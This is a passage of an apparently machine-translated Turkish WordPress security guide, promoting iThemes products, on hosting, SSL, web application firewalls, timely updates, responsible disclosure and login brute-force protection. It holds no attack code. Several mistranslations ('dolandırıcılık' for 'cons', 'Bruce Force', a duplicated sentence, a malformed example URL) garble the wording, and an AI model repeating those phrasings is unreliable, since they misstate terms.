4. Bölüm: Sunucunuzun Güvenliğini Sağlama

WordPress güvenlik stratejinizdeki ilk adım, sunucunuzu güvence altına almaktır. Sunucunuz, web sitenizi çalıştıran tüm dosyaları ve kodları depolar.

Bu bölümde şunları öğreneceksiniz:

1. İyi bir ev sahibi seçmenin önemi.
2. Web sitenizdeki iletişimleri nasıl şifreleyebilirsiniz.
3. Güvenlik duvarı sitenizin güvenliğini sağlamaya nasıl yardımcı olabilir?

Doğru Barındırma Seçin

Tüm web barındırıcıları eşit yaratılmamıştır ve yalnızca fiyat üzerinden bir tane seçmek, WordPress güvenlik sorunlarıyla uzun vadede size çok daha pahalıya mal olabilir. Çoğu paylaşılan barındırma ortamı güvenlidir, ancak bazıları kullanıcı hesaplarını yeterince ayırmaz.

Barındırıcınız, en son güvenlik yamalarını uygulama ve sunucu ve dosya güvenliğiyle ilgili diğer önemli barındırma WordPress güvenliği en iyi uygulamalarını takip etme konusunda dikkatli olmalıdır. Barındırıcınız, en son güvenlik düzeltme eklerini uygulama ve sunucu ve dosya güvenliğiyle ilgili diğer önemli barındırma güvenliği en iyi uygulamalarını izleme konusunda dikkatli olmalıdır.

WordPress Sitenizi SSL ile Şifreleyin

SSL olarak da bilinen Secure Sockets Layer, bir istemci ile bir web sunucusu arasında şifreleme sağlayan bir güvenlik teknolojisidir. Bunu biraz daha basit bir şekilde anlamak için, bir "istemci", Chrome veya Safari gibi bir web tarayıcısıdır ve bir "web sunucusu", web siteniz veya çevrimiçi mağazanızdır.

Ziyaret ettiğiniz web sitesinde yüklü bir SSL sertifikası olup olmadığını anlamanın kolay bir yolu, URL'nin HTTP veya HTTPS ile başlayıp başlamadığını görmek için tarayıcınızın adres çubuğuna bakmaktır. URL bir HTTPS ile başlıyorsa, SSL kullanan bir siteye güvenle göz atıyorsunuz demektir.

SSL Neden Bu Kadar Önemli?

2021 yılında bir SSL sertifikası yoksa pahalıdır. Niye ya? Web sitenizde SSL etkin değilse, potansiyel müşterilerin varlığınızı keşfetmesi daha zor olacaktır ve sitenizi bulanlar size para vermekten korkabilirler.

Ne zaman çevrimiçi bir satın alma işlemi yapsak, tarayıcınız ve çevrimiçi mağaza arasında gerçekleşen bir iletişim vardır. Örneğin tarayıcımıza kredi kartı numaramızı girdiğimizde tarayıcımız numarayı online mağaza ile paylaşacaktır. Mağaza ödemeyi aldıktan sonra, tarayıcınıza satın alma işleminizin başarılı olduğunu bildirmesini söyler.

Tarayıcımız ve mağazanın sunucusu arasında paylaşılan bilgiler hakkında akılda tutulması gereken bir şey, bilgilerin geçiş sırasında birkaç duraklamasıdır. SSL, mağaza sunucusunun son hedefine ulaşana kadar kredi kartımızın görülmemesini sağlamak için iletişime şifreleme sağlar.

Şifrelemenin nasıl çalıştığını daha iyi anlamak için satın almalarımızın nasıl teslim edildiğini düşünün. Çevrimiçi bir satın alma işleminin teslimat durumunu daha önce takip ettiyseniz, siparişinizin evinize varmadan önce birkaç kez durduğunu görürdünüz. Satıcı satın aldığınız ürünü düzgün bir şekilde paketlemediyse, insanların satın aldığınız ürünü görmesi kolay olacaktır.

SSL, istemci ve web sunucusu arasında paylaşılan parolalar ve kredi kartı numaraları gibi hassas bilgileri kötü niyetli kişilerin ele geçirmesini önlemede çok önemli bir araçtır.

Neden Bir SSL Sertifikası Her Web Sitesinde Olması Gerekir?

Web sitenizde bir SSL sertifikasına sahip olmanın sağladığı WordPress güvenlik avantajları, onu herhangi bir web sitesi için olmazsa olmaz hale getirmek için yeterlidir. Ancak, herkesi site ziyaretçilerini korumaya teşvik etmek için web tarayıcıları ve arama motorları, herkesi SSL kullanmaya teşvik etmek için olumsuz teşvikler yarattı. Bu bölümde, web sitenizde SSL'yi etkinleştirmemenin maliyetli sonuçlarını ele alacağız.

1. SSL'nin Etkinleştirilmemesi SEO Sıralamanıza Zarar Verir

Arama Motoru Optimizasyonu veya SEO, web sitenizi arama motoru sonuç sayfaları aracılığıyla organik olarak keşfedilecek şekilde optimize etme işlemidir. SEO'nun faydası, sitenize gelen organik ve ücretsiz trafiği artırmanız için mükemmel bir yol olmasıdır. Bir ekmek pişirme kursu satıyorsanız, web sitenizin Google'da arama yapan biri için sonuçların ilk sayfasında veya ekmek pişirme kursu için Duck Duck Go'da olmasını istersiniz.

Sitenizde SSL etkin olmadığında, arama motorları sizi cezalandırır ve sıralamanızı düşürür. Google'ın web sitelerini arama sonuçlarında sıralamak için kullandığı metriklerden biri güvenilirliktir. Kullanıcılarını güvenli olmayan web sitelerine göndermemek Google'ın en büyük yararıdır, bu nedenle, sıralama algoritmalarında güvenilirlik büyük ölçüde ağırlıklıdır. SSL'nin bu kadar fazla güvenlik sağlamasıyla, Google'ın bir web sitesinin güvenilirliğini nasıl puanladığının önemli bir parçasıdır.

2. Tarayıcılar SSL Olmayan Siteleri Güvenli Değil Olarak İşaretler

SSL'yi etkinleştirmemenin size maliyeti olacak başka bir yol, ziyaretçinizin tarayıcısının onları sitenizin güvenli olmadığı konusunda uyarmasıdır. Daha önce de belirttiğimiz gibi, web sitenize bir SSL sertifikası yükledikten sonra sitenizin URL'si http ://websiteniz.com'dan https: //websiteniz/com'a dönüşecektir. Örneğin Chrome, kilitli bir asma kilitle HTTPS şifreli web sayfalarını güvenli olarak işaretler. Alternatif olarak, Chrome şifrelenmemiş tüm HTTP web sayfaları için kilitli asma kilidi Not Secure metniyle değiştirir.

Tarayıcım tarafından güvensiz olarak işaretlenen web sitelerinden alışveriş yapmayacağım ve yapmayacak olan tek kişi ben değilim. GlobalSign tarafından yapılan bir araştırmaya göre, çevrimiçi alışveriş yapanların %85'i güvenli olmayan web sitelerinden kaçınıyor. 2021'de yalnızca giriş ve ödeme sayfalarınızın değil, tüm sitelerinizin HTTPS kullanmasının hayati önem taşıdığını unutmayın. Potansiyel bir müşteri, mağaza sayfaları web tarayıcıları tarafından Güvenli Değil olarak işaretlenmişse güvenli bir ödeme yapamayabilir.

3. Potansiyel Müşterileri Kaybedebilirsiniz

Müşterilerinizi korumak, web sitenizde SSL'yi etkinleştirmenin temel nedenidir. Size işlerini emanet etmek istiyorlarsa, yapabileceğiniz en az şey, onları şifreleme gücüyle koruyarak bu güveni ödüllendirmektir.

Bir bilgisayar korsanı, web sitenizdeki şifreleme eksikliği nedeniyle müşterinizin kredi kartı ayrıntılarını çalabilirse, yalnızca güvenlerini kaybetmekle kalmaz, gelecekteki işlerini de kaybedersiniz.

Web Sitemde SSL'nin Etkin Olduğunu Nasıl Anlarım?

Web sitenizde yüklü bir SSL sertifikası olup olmadığını anlamanın kolay bir yolu, URL'nin HTTP veya HTTPS ile başlayıp başlamadığını görmek için tarayıcınızın adres çubuğuna bakmaktır. URL bir HTTPS ile başlıyorsa, web siteniz SSL ile güvence altına alınmıştır.

SSL Labs gibi bir SSL denetleyicisi de kullanabilirsiniz. Bir SSL denetleyicisi, sitenizi bir SSL sertifikası için tarar ve SSL sertifikanızın süresinin dolmak üzere olduğunu size bildirir.

WordPress Web Siteme Nasıl SSL Sertifikası Yükleyebilirim?

WordPress web sitenizde SSL yoksa, yapmanız gereken ilk şey, barındırma sağlayıcınızdan ücretsiz bir SSL sertifikası ve yapılandırması sağlayıp sağlamadıklarını sormaktır. 2021'de çoğu barındırma şirketi, barındırma paketlerine SSL'yi dahil eder. Örneğin, iThemes Hosting her web sitesi için SSL sağlar ve yönetir.

Barındırıcınız size ücretsiz bir SSL sertifikası sağlamıyorsa endişelenmeyin, daha birçok seçenek var.

Cloudflare, WordPress web siteleri için ücretsiz bir paylaşılan SSL sertifikası sunar. Paylaşılan bir SSL sertifikasına sahip olmamayı tercih ediyorsanız ve komut satırı konusunda rahatsanız, CertBot mükemmel bir seçenektir. Certbot, Let's Encrypt kullanarak sizin için sadece ücretsiz bir SSL sertifikası oluşturmakla kalmaz, aynı zamanda sertifikanın yenilenmesini de sizin için otomatik olarak yönetir.

WordPress web sitenizde SSL'nin etkin olması 2021'de bir zorunluluktur. SSL, müşterilerinizle aranızdaki iletişimi güvence altına alır, SEO'nuzu geliştirir ve sitenizin ziyaretçilerine web sitenizde gezinirken güvende olduklarının rahatlığını verir.

Bir Web Uygulaması Güvenlik Duvarı kullanın

Bir Web Uygulaması Güvenlik Duvarı kullanmak, WordPress web sitenize başka bir koruma katmanı eklemenin harika bir yoludur.

Web Uygulaması Güvenlik Duvarı nedir?

Bir WAF veya Web Uygulaması Güvenlik Duvarı, web sitenize giden internet trafiğini web sitenize ulaşmadan önce izleyerek web sitenizin güvenliğini sağlamaya yardımcı olur.

WordPress'in önüne bir WAF ekleyerek, internet ve web siteniz arasında bir güvenlik kontrol noktası eklemiş olursunuz. Trafiğin web sitenize erişebilmesi için önce WAF'tan geçmesi gerekir.

WAF, CSRF, XSS, SQL Enjeksiyonları ve daha fazlası gibi herhangi bir kötü amaçlı trafik algılarsa, web sitenize ulaşmadan önce filtreler. Sadece bu değil, bir WAF, bir DDoS saldırısını tespit etmeye ve web sitenizin çökmesini önlemek için hız sınırlaması uygulamaya yardımcı olabilir.

WAF Uygulamanın 3 Yolu

Bir WAF'yi uygulamanın 3 farklı yolu vardır. Her türün artılarına ve eksilerine bir göz atalım.

1. Ağ tabanlı WAF – Ağ tabanlı veya fiziksel bir WAF, donanım tabanlıdır. Ağ tabanlı bir WAF'nin en büyük profesyoneli, yerel olarak kurulmasından kaynaklanan düşük gecikme süresidir. Bununla birlikte, dolandırıcılık, fiziksel ekipmanın depolanması ve bakımının fiyatından kaynaklanmaktadır. Fiyat ve fiziksel depolama gereksinimleri, bunu çoğu insan için kötü bir seçim haline getiriyor.
2. Ana bilgisayar tabanlı WAF – Ana bilgisayar tabanlı veya yerel bir WAF, genellikle bir eklenti kullanılarak WordPress'e entegre edilir. Ana bilgisayar tabanlı bir WAF'nin profesyoneli, ağ tabanlı bir WAF'den daha ucuz olmasıdır. Yerel bir WAF'nin con, sunucu kaynaklarınızın gereksinimleridir. Ve web sitenizde gerçekleşen trafik filtrelemesi, web sitenizin ziyaretçileri için daha yavaş sayfa yükleme sürelerine neden olabilir.
3. Bulut tabanlı WAF – Bulut tabanlı bir WAF, çoğu insan için genellikle en iyi seçenektir. Bulut tabanlı bir WAF'nin profesyoneli, uygun maliyetli olmalarıdır, onu yönetmenize gerek yoktur. Ayrıca, trafik web sitenize ulaşmadan önce filtrelendiğinden, sunucu kaynaklarınızı tüketmez ve web sitenizi yavaşlatmaz. Cloudflare ve Sucuri, popüler bulut tabanlı güvenlik duvarı sağlayıcılarıdır.

Toplama

Bu bölümde, doğru ana bilgisayarı seçmenin neden bu kadar önemli olduğunu, web sitemiz ile ziyaretçileri arasındaki iletişimin nasıl güvence altına alınacağını ve bir WAF'nin kötü niyetli trafiğin web sitemize ulaşmasını engellemeye nasıl yardımcı olabileceğini öğrendik.

Bir sonraki bölümde, WordPress yazılımınızı güvende tutmak için en iyi uygulamaları öğreneceksiniz.

Bölüm 5: WordPress Yazılım Güvenliği

Her yeni eklenti veya tema yüklediğinizde, bilgisayar korsanları tarafından istismar edilme potansiyeline sahip yeni bir kod sunarsınız. Bu bölümde, WordPress, eklentiler ve temaları yönetmenin yapılması ve yapılmaması gerekenleri öğreneceksiniz.

1. Yalnızca Güvenilir Kaynaklardan Yazılım Yükleyin

Yalnızca güvenilir kaynaklardan gelen WordPress eklentilerini ve temalarını yükleyin. Yalnızca WordPress.org'dan, iyi bilinen ticari depolardan veya doğrudan saygın geliştiricilerden aldığınız yazılımları yüklemelisiniz. Kötü amaçlı kod içerebilecekleri için ticari eklentilerin "boş" sürümlerinden kaçınmak isteyeceksiniz. Kötü amaçlı yazılım yükleyen sizseniz, WordPress sitenizi nasıl kilitlediğinizin bir önemi yoktur.

WordPress eklentisi veya teması geliştiricinin web sitesinde dağıtılmıyorsa, eklentiyi indirmeden önce gerekli özeni göstermek isteyeceksiniz. Ürünlerini ücretsiz veya indirimli fiyatla sunan web sitesine herhangi bir şekilde bağlı olup olmadıklarını öğrenmek için geliştiricilere ulaşın.

2. Kullanılmayan Eklenti ve Temaları Kaldırın

Kullanılmayan veya etkin olmayan eklentilerin ve temaların web sitenizde bulunması büyük bir WordPress güvenlik hatasıdır. Web sitenizdeki her kod parçası, bir bilgisayar korsanı için potansiyel bir giriş noktasıdır.

Geliştiricilerin eklentilerinde ve temalarında üçüncü taraf kod benzeri JS kitaplıkları kullanmaları yaygın bir uygulamadır. Ne yazık ki, kitaplıklar düzgün bir şekilde korunmazsa, saldırganların web sitenizi hacklemek için kullanabileceği güvenlik açıkları oluşturabilirler.

Not: Bilinen güvenlik açıklarına sahip ön uç JavaScript kitaplıkları için web sayfalarınızı kontrol etmek için iThemes Sync Pro Site Denetimini kullanın.

Web sitenizdeki erişim noktalarının ve yürütülebilir kodların sayısını sınırlamak için WordPress sitenizdeki gereksiz eklentileri ve temaları kaldırın ve tamamen kaldırın.

3. WordPress Yazılımınızı Güncel Tutun

Yazılımı güncel tutmak, herhangi bir WordPress güvenlik stratejisinin önemli bir parçasıdır. Güncellemeler yalnızca hata düzeltmeleri ve yeni özellikler için değildir. Güncellemeler ayrıca kritik güvenlik yamalarını da içerebilir. Bu yama olmadan telefonunuzu, bilgisayarınızı, sunucunuzu, yönlendiricinizi veya web sitenizi saldırılara karşı savunmasız bırakıyorsunuz.

Bir yamanın mevcut olduğu ancak uygulanmadığı savunmasız bir eklentiye veya temaya sahip olmak, saldırıya uğramış WordPress web sitelerinin bir numaralı suçlusudur. Bu, çoğu güvenlik açığından, güvenlik açığı için bir yama yayımlandıktan SONRA yararlanılacağı anlamına gelir.

Çok rapor edilen Equifax ihlali, yazılımlarını güncelleselerdi önlenebilirdi. Equifax ihlali için hiçbir mazeret yoktu.

Yazılımınızı güncellemek kadar basit bir şey sizi koruyabilir. Bu nedenle, bu WordPress güncellemelerini göz ardı etmeyin — güncellemeler , WordPress güvenliğinin ve tüm web güvenliğinin en temel bileşenlerinden biridir.

Yama Salı

Salı Yaması, Microsoft'un her ayın ikinci Salı günü yayınladığı düzenli hata ve güvenlik düzeltmelerine atıfta bulunan resmi olmayan bir terimdir. Microsoft'un bu kadar güvenilir bir kadansta güvenlik düzeltmeleri yayınlaması harika. Salı Yaması aynı zamanda Microsoft'un yamaladığı güvenlik açıklarının kamuya açıklandığı gündür.

Yama Salı güncellemelerini otomatik olarak nasıl uygulayacağınızı öğrenmek için 2020'de WordPress Güvenliğine Yönelik En İyi Kılavuz'un Güncellemelerinizi Nasıl Otomatikleştireceğinizi ve Güncellemelerinizi Nasıl Otomatikleştireceğinizi inceleyin.

Çarşamba yararlanın

Salı Yamasını takip eden Çarşamba günü, birçok saldırganın eski ve yama uygulanmamış sistemlerde önceden bilinen bir güvenlik açığından yararlandığını görmek olağandır. Bu nedenle, Salı Yamasını izleyen Çarşamba, gayri resmi olarak Çarşamba günü Exploit olarak adlandırıldı.

Hackerlar Neden Yamalı Güvenlik Açıklarını Hedefliyor?

Bilgisayar korsanları, insanların güncelleme yapmadığını bildikleri için (web sitenizdeki eklentiler ve temalar dahil) yamalı güvenlik açıklarını hedefler. Güvenlik açıklarının yamalandığı gün kamuya açıklanması bir endüstri standardıdır. Bir güvenlik açığı kamuya açıklandıktan sonra, yazılımın güncel olmayan ve yama uygulanmamış sürümleri için güvenlik açığı "bilinen bir güvenlik açığı" haline gelir. Bilinen güvenlik açıklarına sahip yazılımlar, bilgisayar korsanları için kolay bir hedeftir.

Bilgisayar korsanları kolay hedefleri sever ve güvenlik açıkları bilinen yazılımlara sahip olmak, bir bilgisayar korsanına WordPress web sitenize, sunucunuza, bilgisayarınıza veya internete bağlı herhangi bir cihaza girmesi için adım adım talimatlar vermek gibidir.

Sorumlu Açıklama

Bilgisayar korsanlarına saldırmak için bir istismar sağlıyorsa, bir güvenlik açığının neden açıklanacağını merak ediyor olabilirsiniz. Bir güvenlik araştırmacısının güvenlik açığını bulup özel olarak yazılım geliştiricisine bildirmesi çok yaygındır.

Sorumlu açıklama ile, araştırmacının ilk raporu, yazılımın sahibi olan şirketin geliştiricilerine özel olarak yapılır, ancak bir yama kullanıma sunulduğunda tüm ayrıntıların yayınlanacağına dair bir anlaşma ile. Önemli güvenlik açıkları için, daha fazla kişiye yama yapması için zaman tanımak için güvenlik açığının açıklanmasında küçük bir gecikme olabilir.

Güvenlik araştırmacısı, yazılım geliştiricinin rapora yanıt vermesi veya bir yama sağlaması için bir son tarih verebilir. Bu süre karşılanmazsa araştırmacı, geliştiriciye bir yama yayınlaması için baskı yapmak için güvenlik açığını kamuya açıklayabilir.

Bir güvenlik açığını herkese açık olarak ifşa etmek ve görünüşte bir Sıfır Günü - yaması olmayan ve vahşi doğada istismar edilen bir tür güvenlik açığı - tanıtmak ters tepebilir. Ancak, bir araştırmacının geliştiriciye güvenlik açığını düzeltmesi için baskı yapması gereken tek kaldıraç budur.

Bir bilgisayar korsanı güvenlik açığını keşfederse, Exploit'i sessizce kullanabilir ve son kullanıcıya (bu sizsiniz) zarar verebilir, yazılım geliştirici ise güvenlik açığını düzeltmeden bırakmaktan memnun kalır.

Google'ın Sıfır Projesi, güvenlik açıklarını ifşa etme konusunda benzer yönergelere sahiptir. Güvenlik açığının yamalanıp düzeltilmediğine bakılmaksızın 90 gün sonra güvenlik açığının tüm ayrıntılarını yayınlarlar.

Güncellemeyi Öğrenmek: Zor Yol

2018'in sonunda bilgisayar korsanları, WP GDPR Uyumluluk eklentisindeki bir istismardan aktif olarak yararlanıyorlardı. Exploit, yetkisiz kullanıcıların (bir web sitesine giriş yapmamış kişiler) WP kullanıcı kayıt ayarlarını değiştirmesine ve varsayılan yeni kullanıcı rolünü bir aboneden bir yöneticiye değiştirmesine izin verdi. Neyse ki, WP GDPR Uyumluluk eklentisi geliştiricileri hızlı davrandı ve güvenlik açığı kamuya açıklandıktan bir gün sonra bu güvenlik açığı için bir yama yayınladı.

Ancak, Çarşamba günü Exploit'te olduğu gibi, bir yama yayınlanmış olmasına rağmen bilgisayar korsanları güvenlik açığını hedef aldı. WP GDPR Uyumluluğu güvenlik açığı ifşasını takip eden günlerde ve haftalarda, WordPress web sitelerinin güvenlik açığından yararlanan saldırganlar tarafından saldırıya uğradığına dair bir dizi rapor aldık.

Bir yamanın mevcut olduğu ancak uygulanmadığı savunmasız bir eklentiye veya temaya sahip olmak, saldırıya uğramış WordPress web sitelerinin bir numaralı suçlusudur. BU ÇOK BÜYÜK!!!!! Bu, çoğu WP hackinin önlenebileceği anlamına gelir.

Web sitelerini temizlemek için tonlarca para harcayan tüm insanları, siteleri kapalıyken kaybettikleri geliri ve müşterilerinin güvenini kaybetmek için kaybedecekleri gelecekteki gelirleri düşünmek üzücü. Tüm bu ıstırabın basit bir güncellemeyle önlenebileceğini bilmek onu daha da üzüyor.

iThemes Security Pro Sürüm Yönetimi özelliği, WordPress güncellemelerinizi özelleştirmenizi ve otomatikleştirmenizi sağlar.

4. WordPress Güvenlik Açıklarını Takip Edin

Eklentilerinizi ve temalarınızı güncel tutmak sizi her WordPress güvenlik açığından korumaz. Bazı WordPress eklentileri ve temaları, onları oluşturan geliştiriciler tarafından terk edilmiştir.

Ne yazık ki, terk edilmiş bir eklenti veya temanın bir güvenlik açığı varsa, asla bir yama almaz. Bilgisayar korsanları, artık kalıcı olarak savunmasız olan bu eklentileri kullanan web sitelerini hedefleyecektir.

Web sitenizde bilinen bir güvenlik açığı bulunan terk edilmiş bir eklentiniz varsa, bilgisayar korsanlarına web sitenizi ele geçirmeleri için ihtiyaç duydukları planları veriyorsunuz. Bu yüzden en son güvenlik açıklarını takip etmelisiniz.

Açıklanan her WordPress güvenlik açığını takip etmek ve bu listeyi web sitenize yüklediğiniz eklentilerin ve temaların sürümleriyle karşılaştırmak zordur. Güvenlik açıklarını takip etmek, güvenli bir web sitesine sahip olmakla bilgisayar korsanlarının kolayca yararlanabileceği bir web sitesine sahip olmak arasındaki farktır.

Senin için iyi haber! WordPress Güvenlik Açığı Özetlerimizde açıklanan her güvenlik açığını takip ediyor ve paylaşıyoruz.

5. Web Sitenizi Güvenlik Açıkları İçin Tarama

Web sitenizi kolay korsan istismarlarından korumanın daha hızlı bir yolu, web sitelerinizi bilinen güvenlik açıkları için kontrol etmek için otomatik taramalar kullanmaktır.

iThemes Security Pro Site Tarayıcı, tüm WordPress web sitelerinizde güvenlik açığı korumasını otomatikleştirmenin yoludur. Site Tarayıcı, sitenizde bilinen güvenlik açıklarını kontrol eder ve varsa otomatik olarak bir yama uygular.

iThemes Security Pro Sitesi, 3 tür güvenlik açığını kontrol eder.

1. WordPress Güvenlik Açıkları
2. Eklenti Güvenlik Açıkları
3. Tema Güvenlik Açıkları

iThemes Sync Pro Site Denetimi özelliği, web sitenizi korumak için Google Lighthouse'un gücünden yararlanır. Site Denetimi, bilinen güvenlik açıklarına sahip ön uç JavaScript kitaplıklarını içeren sayfaları kontrol eder ve işaretler.

Geliştiricilerin eklentilerinde ve temalarında üçüncü taraf kod benzeri JS kitaplıkları kullanmaları yaygın bir uygulamadır. Ne yazık ki, kitaplıklar düzgün bir şekilde korunmazsa, saldırganların web sitenizi hacklemek için kullanabileceği güvenlik açıkları oluşturabilirler. Bilinen Güvenlik Açıklarına Sahip Bileşenleri Kullanmak, OWASP İlk 10 listesindedir.

Site Denetimi pastırmamı kurtardı! Sync Pro'nun haftalık otomatik denetimler gerçekleştirmesi ve denetim raporlarını bana e-postayla göndermesi için bir Denetim Takvimi oluşturdum. Her şeyi güncel tutuyorum ve bu yüzden web sitemin denetimlerinden birinde bilinen güvenlik açıklarına sahip JavaScript kitaplıkları kullandığımı gördüğümde şok oldum.

Rapor, web sitesinin WordPress dizininde bilinen güvenlik açıklarıyla dolu eski bir jQuery sürümüne işaret etti! Şansıma, Sync Pro Site Denetimimde bilinen güvenlik açıklarına sahip JavaScript kitaplıkları kullandığımı ve web sitem saldırıya uğramadan önce sorunu çözebildiğimi gördüm.

Toplama

WordPress eklentileriniz, temalarınız ve WordPress çekirdeğiniz dahil olmak üzere web sitenizi çalıştıran yazılımı düzgün bir şekilde yönetmek, WordPress güvenlik stratejinizde uzun bir yol kat edecek ve web sitenizi çevrimiçi saldırganlara karşı güvence altına alacaktır.

Bölüm 6: WordPress Girişinizin Güvenliğini Sağlama

WordPress giriş URL'si her WordPress sitesi için aynıdır ve erişim için herhangi bir özel izin gerektirmez. WordPress ile çalışma deneyimi olan herkes, giriş URL'sinin /wp-login.php sayfasında bulunduğunu bilir.

WordPress giriş sayfasının erişilebilirliği, onu herhangi bir WordPress web sitesinin en saldırıya uğrayan ve potansiyel olarak en savunmasız olan parçası yapar. Neyse ki bizim için iThemes Security Pro eklentisi, WordPress girişinizi güvenli hale getirmeyi kolaylaştırır.

WordPress girişinizi güvenli hale getirmek ve neredeyse aşılmaz kılmak için kullanabileceğiniz iThemes Security Pro'daki araçlara bir göz atalım!

1. Giriş Denemelerini Sınırlayın

WordPress girişinizi güvence altına almanın ilk adımı, başarısız giriş denemelerini sınırlamaktır. Varsayılan olarak, birinin yapabileceği başarısız oturum açma girişimlerinin sayısını sınırlamak için WordPress'te yerleşik bir şey yoktur. Bir saldırganın yapabileceği başarısız oturum açma denemelerinin sayısında bir sınırlama olmaksızın, çalışan bir tane bulana kadar farklı kullanıcı adları ve şifrelerin bir kombinasyonunu denemeye devam edebilir.

iThemes Security Pro Yerel Kaba Kuvvet Koruması özelliği, bir ana bilgisayar veya IP adresi ve bir kullanıcı adı tarafından yapılan geçersiz oturum açma girişimlerinin kaydını tutar. Bir IP veya kullanıcı adı arka arkaya çok sayıda geçersiz giriş denemesi yaptığında, kilitlenirler ve belirli bir süre boyunca daha fazla deneme yapmaları engellenir.

Yerel Kaba Kuvvet Koruması özelliğini kullanmaya başlamak için, bunu iThemes Security Pro ayarlar sayfasının ana sayfasında etkinleştirin.

Yerel Kaba Kuvvet Koruması ayarları, kilitleme eşiklerini ayarlamanıza olanak tanır.

• Ana Bilgisayar Başına Maksimum Oturum Açma Denemesi – Kilitlenmeden önce bir IP'ye izin verilen geçersiz oturum açma denemelerinin sayısı.
• Kullanıcı Başına Maksimum Giriş Denemesi – Bu, bir kullanıcı adı kilitlenmeden önce izin verilen geçersiz giriş denemelerinin sayısıdır.
• Hatalı Oturum Açmayı Hatırlayacak Dakikalar – Geçersiz bir oturum açma girişiminin, bir kilitleme için bir IP veya kullanıcı adına karşı sayılması gereken süredir.
• "Yönetici" kullanıcıyı otomatik olarak yasakla - Etkinleştirildiğinde, oturum açarken Yönetici kullanıcı adını kullanan herkes otomatik olarak kilitlenir.

Kilitleme ayarlarınızı yapılandırırken aklınızda bulundurmanız gereken birkaç şey vardır. Kullanıcılara IP verdiğinizden daha geçersiz oturum açma girişimleri vermek istiyorsunuz. Diyelim ki web siteniz kaba kuvvet saldırısı altında ve saldırgan kullanıcı adınızı kullanıyor. Amaç, kullanıcı adınızı değil, saldırganın IP'sini kilitlemektir, böylece web siteniz saldırı altındayken bile giriş yapabilir ve işlerinizi halledebilirsiniz.

Ayrıca, geçersiz oturum açma denemelerinin sayısını çok düşük ve geçersiz denemeleri hatırlama süresini çok uzun süre ayarlayarak bu ayarları çok katı yapmak istemezsiniz. Ana bilgisayarlar/IP'ler için geçersiz oturum açma denemelerinin sayısını 1'e düşürürseniz ve kötü bir oturum açma girişimini hatırlamak için dakikayı bir aya ayarlarsanız, yanlışlıkla meşru kullanıcıları kilitleme olasılığını önemli ölçüde artırırsınız.

2. İstek Başına Dış Kimlik Doğrulama Girişimlerini Sınırlayın

Giriş formu kullanmanın yanı sıra WordPress'e giriş yapmanın başka yolları da vardır. Saldırgan XML-RPC kullanarak tek bir HTTP isteğinde yüzlerce kullanıcı adı ve parola denemesi yapabilir. Kaba kuvvet yükseltme yöntemi, saldırganların yalnızca birkaç HTTP isteğinde XML-RPC kullanarak binlerce kullanıcı adı ve parola denemesi yapmasına olanak tanır.

iThemes Security Pro'nun WordPress Tweaks ayarlarını kullanarak, XML-RPC isteği başına birden çok kimlik doğrulama girişimini engelleyebilirsiniz. Kullanıcı adı ve şifre denemelerinin sayısını her istek için bir tane ile sınırlamak, WordPress girişinizi güvence altına almak için uzun bir yol kat edecektir.

3. Ağ Kaba Kuvvet Koruması

Giriş denemelerini sınırlamak tamamen yerel kaba kuvvet koruması ile ilgilidir. Yerel kaba kuvvet koruması, yalnızca sitenize erişme girişimlerine bakar ve güvenlik ayarlarınızda belirtilen kilitleme kurallarına göre kullanıcıları yasaklar.

Ağ Kaba Kuvvet koruması bunu bir adım daha ileri götürür. Ağ , iThemes Güvenlik topluluğudur ve bir milyondan fazla web sitesi güçlüdür. Bir IP'nin iThemes Security topluluğundaki web sitelerine girmeye çalıştığı belirlenirse, IP, Ağ Bruce Force yasaklı listesine eklenir.

Bir IP, Network Brute Force yasaklı listesine girdikten sonra, ağdaki tüm web sitelerinde IP engellenir. Bu nedenle, bir IP web siteme saldırır ve yasaklanırsa, iThemes Security Brute Force Network'e bildirilecektir. Raporum IP'nin tüm ağda yasaklanmasına yardımcı olabilir. Yalnızca iThemes Güvenlik Ağ Korumasını etkinleştirerek diğer kişilerin WordPress oturum açma bilgilerinin güvenliğini sağlamaya yardımcı olabileceğimi seviyorum.

Network Force Protection'ı kullanmaya başlamak için, güvenlik ayarlarının ana sayfasında etkinleştirin.

Ardından e-posta adresinizi girin, e-posta güncellemelerini almak isteyip istemediğinizi seçin ve ardından Kaydet düğmesini tıklayın.

4. WP Dashboard'a Cihaz Erişimini Sınırlayın

WordPress girişinizi güvence altına almanın son adımı, WordPress kontrol panelinize erişimi bir dizi cihazla sınırlamaktır. iThemes Security Pro Güvenilir Cihazlar özelliği, sizin ve diğer kullanıcıların WordPress sitenize giriş yapmak için kullandığı cihazları tanımlar. Bir kullanıcı tanınmayan bir cihazda oturum açtığında, Güvenilir Cihazlar yönetici düzeyindeki yeteneklerini kısıtlayabilir. Bu, bir bilgisayar korsanının diğer oturum açma güvenlik yöntemlerinizi atlayabildiği anlamına gelir – pek olası değildir – web sitenizde herhangi bir kötü niyetli değişiklik yapma becerisine sahip olmayacaklardır.

Güvenilir Cihazları kullanmaya başlamak için, bunları güvenlik ayarlarının ana sayfasında etkinleştirin ve ardından Ayarları Yapılandır düğmesini tıklayın.

Güvenilir Cihazlar ayarlarında, özelliği kullanmak istediğiniz kullanıcılara karar verin ve ardından Yetenekleri Kısıtla ve Oturum Ele Geçirme Koruması özelliklerini etkinleştirin.

Yeni Güvenilir Cihazlar ayarını etkinleştirdikten sonra, kullanıcılar, tanınmayan cihazlar hakkında WordPress yönetici çubuğunda bir bildirim alacaklardır. Mevcut cihazınız güvenilir cihazlar listesine eklenmemişse, yetkilendirme e-postasını göndermek için Bu Cihazı Onayla bağlantısını tıklayın .

Mevcut cihazlarınızı Güvenilir Cihazlar listesine eklemek için Tanınmayan Oturum Açma e-postasındaki Cihazı Onayla düğmesini tıklayın.

Toplama

WordPress giriş sayfasının erişilebilirliği, onu herhangi bir WordPress sitesinin en saldırıya uğrayan ve potansiyel olarak savunmasız olan bir parçası haline getirir. Ancak, bu bölümdeki adımları kullanmak WordPress girişinizi neredeyse aşılmaz hale getirecektir.

7. Bölüm: WordPress Kullanıcılarınızın Güvenliğini Sağlama

Ne zaman kullanıcı güvenliği hakkında konuşsak, her WordPress kullanıcısının aynı güvenlik gereksinimlerine sahip olması gerekir mi ve ne kadar güvenlik çok fazla güvenliktir gibi sorular duyarız.

Merak etme. Tüm bu soruları cevaplıyoruz. Ama önce, farklı WordPress kullanıcıları hakkında konuşalım.

Farklı WordPress kullanıcıları nelerdir?

5 farklı varsayılan WordPress kullanıcısı vardır.

1. yönetici
2. Editör
3. Yazar
4. Katkıda Bulunan
5. Abone

